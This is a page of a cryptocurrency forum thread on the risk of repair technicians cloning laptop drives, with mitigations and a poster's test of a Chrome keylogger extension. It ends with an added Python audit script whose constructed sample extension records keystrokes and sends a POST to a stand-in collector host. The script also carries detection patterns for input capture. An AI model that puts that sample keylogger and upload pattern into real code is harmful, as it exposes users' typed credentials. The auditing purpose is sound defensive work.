
Topic: Recovering deleted wallet/files from HDD - page 2. (Read 715 times)

legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 07, 2021, 05:22:34 AM
#54
I am not sure many laptops allow for easy HDD removal, even more so without breaking the warranty (Mac users, anyone?).
Suggestion: add it to your opsec checklist to only buy laptops that allow you to easily take out the drive.
legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 07, 2021, 05:02:19 AM
#53

Just like @LoyceV said, remove the HDD before giving the device to someone else. If they ask why the HDD is missing, you could say you need the data for urgent work and ask them to use their own HDD/USB drive for testing.

I am not sure many laptops allow for easy HDD removal, even more so without breaking the warranty (Mac users, anyone?).
Also, even if I don't have any wallet on it, a malicious user could do extremely dangerous things just by having access to my email.
Basically, when you give your laptop to an external technician, you are trusting him not to rip you off.
Maybe it's worth asking to attend your repair in person, so that you don't leave him alone with your data. This could be counterproductive for opsec reasons anyway.
hero member
Activity: 2800
Merit: 595
https://www.betcoin.ag
November 07, 2021, 03:37:51 AM
#52

Giving the laptop with its drive will likely give that computer guy access to old passwords saved on browsers.

I would probably just follow what LoyceV suggested that you take out the HD and then sell it to that computer guy, that's the best and easiest way to do it unless you want the risky option. There could be more files you have there in the hard drive which you can slave later on another computer and scan it all like pictures, txt files, and downloaded files.
jr. member
Activity: 107
Merit: 7
November 07, 2021, 03:22:06 AM
#51
If you ever send it to "anybody" then assume it's been compromised. As to how to handle it, the answer is still the same. Use a hardware wallet. That way, even if all its content is stolen and you get it back with keyloggers and trojans, they still can't access your assets.
At the very least, transfer everything off the machine before sending it off and don't use it for local wallets again until you wipe it off.
full member
Activity: 1792
Merit: 186
November 06, 2021, 04:57:02 PM
#50
So how do you guys handle it when there is an issue and you need to bring your laptop to a repair shop or return it to the company?  Assuming you can just check your hard drive which is to see what is the problem, isn't this already a big issue?  Like imagine it just shows ledger live or electrum as an icon on your computer when they turn it on.


I mean wouldn't they most likely inspect it?
legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 06, 2021, 07:48:26 AM
#49
What if something breaks on your laptop where you have critical information?
I was serious when I wrote this:
Or use a screwdriver, as that's all it takes to take out the drive.

What if your power supply breaks on your laptop?
I'd probably fix it myself :)

Quote
Can you trust your repair shop will not duplicate your hdd?
You can assume this, but you can only be sure if you don't let your HDD out of sight.

Quote
When I gave my phone to a repair shop, I reset it to factory settings, but had the luxury of being able to prepare for the event.
What should you do in case of an “unforeseeable” event?
Phones are much worse: you can't just take out the disk to send it in for repairs. But phones are also much more likely to get stolen, so I'd say don't store more data on it than you're willing to lose.
hero member
Activity: 1778
Merit: 907
November 06, 2021, 07:00:03 AM
#48

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave



Interesting question then is: what if something breaks on your laptop where you have critical information? What if your power supply breaks on your laptop? Can you trust that your repair shop will not duplicate your HDD?

Any ways of mitigating this? Even if the wallet.dats are encrypted, I bet there will still be loads of passwords saved while browsing, that can do a lot of damage.

When I gave my phone to a repair shop, I reset it to factory settings, but had the luxury of being able to prepare for the event.
What should you do in case of an “unforeseeable” event?

I used to have a desktop computer but the motherboard died on me and never bothered to repair it. Supposing you have a desktop PC, it's not that hard to mount a HDD and recover your data. If I had one myself, I wouldn't have bothered taking it to a technician, since the laptop itself is pretty cheap.
legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 06, 2021, 06:37:07 AM
#47

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave



Interesting question then is: what if something breaks on your laptop where you have critical information? What if your power supply breaks on your laptop? Can you trust that your repair shop will not duplicate your HDD?

Any ways of mitigating this? Even if the wallet.dats are encrypted, I bet there will still be loads of passwords saved while browsing, that can do a lot of damage.

When I gave my phone to a repair shop, I reset it to factory settings, but had the luxury of being able to prepare for the event.
What should you do in case of an “unforeseeable” event?
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
November 05, 2021, 06:48:23 AM
#46


Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
-Dave

those little sata 2 port "docking stations" are not so good as what you might think. if there's one constant about them it is people complaining how it f***ed up their hard drives and made them "raw". doesn't matter the brand.

Looking at my work notes we have done over 170 Spinning drives to SSD since Jan 1 2020 for a client who was extending the life of some older machines so either you and the people you are talking to are using cheap cloners or we have some amazing luck.

I don't know how the $80 generic ones work, but the 'real' ones are just running an embedded Linux controller and dd'ing (more or less) the entire drive.
The source is only ever mounted in read only so having it come back as 'raw' is just about impossible.

This: https://www.amazon.com/SATA-Hard-Drive-Duplicator-Eraser/dp/B00G6TG5YE
is not the same as this: https://www.mediaduplicationsystems.com/fx2125-sata-sas-usb3.0-hard-drive-duplicator

If you walk into a shop or your tech is using something like the StarTech one, run away as fast as you can.

The point is the professional ones can do 30+GB a minute if the drives can keep up so yes, you can pull and clone and replace a filled 1TB drive in about an hour.

-Dave

legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 05, 2021, 04:36:32 AM
#45
Next time I have a problem I will destroy my laptop with a hammer. I am not going to leave my HDD unattended anymore!
Or use a screwdriver, as that's all it takes to take out the drive.
Or use full disk encryption.
Or an industrial shredder. I prefer a more subtle approach to my hardware.
Seriously though: there's no point to destroy any hardware that doesn't hold data.

Apparently your AI is not sophisticated enough to detect the rhetorical construction known as “metonymy”.
Or actually your AI is so advanced that it pretends to misunderstand something in order to appear more human.

Or it’s just me, who thinks a joke is funny when it is not.
legendary
Activity: 3290
Merit: 16489
Thick-Skinned Gang Leader and Golden Feather 2021
November 05, 2021, 04:10:49 AM
#44
Next time I have a problem I will destroy my laptop with a hammer. I am not going to leave my HDD unattended anymore!
Or use a screwdriver, as that's all it takes to take out the drive.
Or use full disk encryption.
Or an industrial shredder. I prefer a more subtle approach to my hardware.
Seriously though: there's no point to destroy any hardware that doesn't hold data.
jr. member
Activity: 107
Merit: 7
November 05, 2021, 03:17:29 AM
#43
Dang.
Now you scared me.
Next time I have a problem I will destroy my laptop with a hammer. I am not going to leave my HDD unattended anymore!

Exactly. Anything glitches, you nuke the entire thing out. Would be bad though if you later discover it was just an OS bug a day later...
sr. member
Activity: 1190
Merit: 469
November 04, 2021, 10:44:17 PM
#42


Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
-Dave

those little sata 2 port "docking stations" are not so good as what you might think. if there's one constant about them it is people complaining how it f***ed up their hard drives and made them "raw". doesn't matter the brand.

legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
November 04, 2021, 07:17:27 PM
#41
I see that he hasn't snooped into Chrome at least, can never be too sure about the rest of the hard drive.
If I would want to read someone's files without them knowing about it, I would create an image of the entire drive. This can easily be done by booting a Linux LIVE OS, or by temporarily plugging the drive into another computer. You wouldn't see any of this on your file system.

Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
PCs / phones / tablets. We live our life on them now, and even the paranoid people can't remember everything that they may have accidentally stored on one.

-Dave

Dang.
Now you scared me.
Next time I have a problem I will destroy my laptop with a hammer. I am not going to leave my HDD unattended anymore!
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
November 04, 2021, 04:20:32 PM
#40
I see that he hasn't snooped into Chrome at least, can never be too sure about the rest of the hard drive.
If I would want to read someone's files without them knowing about it, I would create an image of the entire drive. This can easily be done by booting a Linux LIVE OS, or by temporarily plugging the drive into another computer. You wouldn't see any of this on your file system.

Or buy a hardware cloner, clone the drives and read them later.
Put client disk in slot 1 blank disk in slot 2 & push a button. Drink beer. Then put disk back in client PC.
PCs / phones / tablets. We live our life on them now, and even the paranoid people can't remember everything that they may have accidentally stored on one.

-Dave
newbie
Activity: 18
Merit: 1
November 04, 2021, 07:28:33 AM
#39
I see that he hasn't snooped into Chrome at least

It would be trivial to mount a drive without touching the files on it (such as Chrome history). Any Linux live USB offers read-only mount support.

Yeah, I'll move everything to new wallets just in case, you can never be safe enough. On top of that, if we suppose that he has snooped through my files, he could potentially try to compromise the wallets at a much later date. That way, no accusation can actually be directed to him.

Absolutely. If I were you, I would definitely pay the transaction fee to move the coins to a new wallet.
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
November 04, 2021, 05:54:00 AM
#38
On the other hand, do you know any kind of similar software that is safe to use?

There are open source versions of such software, but I wouldn't recommend them unless you bother to audit/test them properly. Besides, there's a saying: "Prevention is better than cure". If you haven't taken any action, you could start by enabling 2FA on your online accounts and using stronger passwords.

or encrypt your computer files when you leave for a long period of time.

It's not practical if you also want to secure your cryptocurrency wallet or browser data, where the files could be scattered across different folders. You could use full disk encryption (such as BitLocker for Windows and LUKS for Linux), but usually you need to enter a password/PIN every time you turn on your laptop and the recovery process is harder (if the disk is corrupted).
member
Activity: 189
Merit: 52
In a world of coins, use them.
November 03, 2021, 04:24:50 PM
#37
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. There is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall Chrome, then change all of your passwords.
Interesting, I remember looking it up to find anything suspicious but couldn't, anyway, good detective work. It logs any kind of text input, it often saved my posts here. Anyway, I've now uninstalled it, since I do not need it anymore and due to the suspicion of it being a security hazard.

On the other hand, do you know any kind of similar software that is safe to use?

I couldn't really recommend any monitoring software for your own machine, but I think you'll be safe enough by pressing WIN + L when you get up to lock your screen, or encrypt your computer files when you leave for a long period of time.
hero member
Activity: 1778
Merit: 907
November 03, 2021, 03:17:21 PM
#36
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. There is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall Chrome, then change all of your passwords.
Interesting, I remember looking it up to find anything suspicious but couldn't, anyway, good detective work. It logs any kind of text input, it often saved my posts here. Anyway, I've now uninstalled it, since I do not need it anymore and due to the suspicion of it being a security hazard.

On the other hand, do you know any kind of similar software that is safe to use?
member
Activity: 189
Merit: 52
In a world of coins, use them.
November 03, 2021, 03:09:32 PM
#35
~snip

From what it claims, it doesn't send any data, and it's stored locally, however, I don't see a reason to keep it anymore, nevertheless, it does look like a safety concern.


What is the name of the extension? I would like to dump the source code of it to see if it sends data anywhere.
The name of the extension is Fea Keylogger, it mentions that it stores all data locally, or at least I hope it does. It'd be interesting to check if it's actually true or not, make sure to report back when you're done testing.

Link: https://chrome.google.com/webstore/detail/fea-keylogger/fgkghpghjcbfcflhoklkcincndlpobja?hl=en

I installed the extension on a Virtual Machine, found a few issues right off the bat.

The extension communicates with the internet, something that "Only saves data locally" shouldn't connect to the internet. There is also another issue with the extension, it logs specifically logins, not just web pages visited and such. After further analysis, the data that it saves isn't even hashed, meaning that all of your logins are compromised if someone gets the data from your local storage of the extension.

My advice would be to uninstall the extension, reinstall Chrome, then change all of your passwords.
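
An added example (not part of any post in this thread, and not the extension's own code): a static first-pass audit of an unpacked browser extension for the contradiction described in post #35, typed-input capture combined with network access despite a "stores locally" claim. The sample extension, its file names and the `collector.example` URL are constructed for illustration.

```python
import json, re, tempfile
from pathlib import Path

# Calls that can send data off the machine.
NETWORK_SINKS = re.compile(r"\b(fetch\s*\(|XMLHttpRequest|WebSocket\s*\(|sendBeacon\s*\()")
# Listeners that capture what the user types or submits.
INPUT_HOOKS = re.compile(
    r"addEventListener\(\s*['\"](keydown|keyup|keypress|input|submit)['\"]")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit_extension(ext_dir):
    """Statically audit an unpacked extension directory; return findings."""
    root = Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    hosts = set(manifest.get("host_permissions", []))
    # Manifest V2 lists host patterns inside "permissions".
    hosts |= {p for p in manifest.get("permissions", [])
              if p == "<all_urls>" or "://" in p}
    for script in manifest.get("content_scripts", []):
        hosts |= set(script.get("matches", []))
    found = {"broad_hosts": sorted(hosts & BROAD_HOSTS),
             "network": [], "input_capture": []}
    for js in sorted(root.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            where = f"{js.relative_to(root).as_posix()}:{lineno}"
            if NETWORK_SINKS.search(line):
                found["network"].append(where)
            if INPUT_HOOKS.search(line):
                found["input_capture"].append(where)
    # A "stores locally only" claim is in doubt when the code both
    # captures typed input and contains a network sink.
    found["contradicts_local_only"] = bool(
        found["network"] and found["input_capture"])
    return found

def build_sample(root):
    """Write a constructed sample extension (not the real extension's code)."""
    root = Path(root)
    manifest = {"manifest_version": 3, "name": "sample-logger", "version": "1.0",
                "permissions": ["storage"],
                "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}
    (root / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (root / "content.js").write_text(
        'document.addEventListener("keydown", e =>\n'
        "  chrome.storage.local.set({[Date.now()]: e.key}));\n", encoding="utf-8")
    (root / "bg.js").write_text(
        'fetch("https://collector.example/upload", {method: "POST"});\n', encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(json.dumps(audit_extension(tmp), indent=2))
```

A static scan like this misses obfuscated or remotely loaded code, so it complements watching the extension's traffic in a VM rather than replacing it.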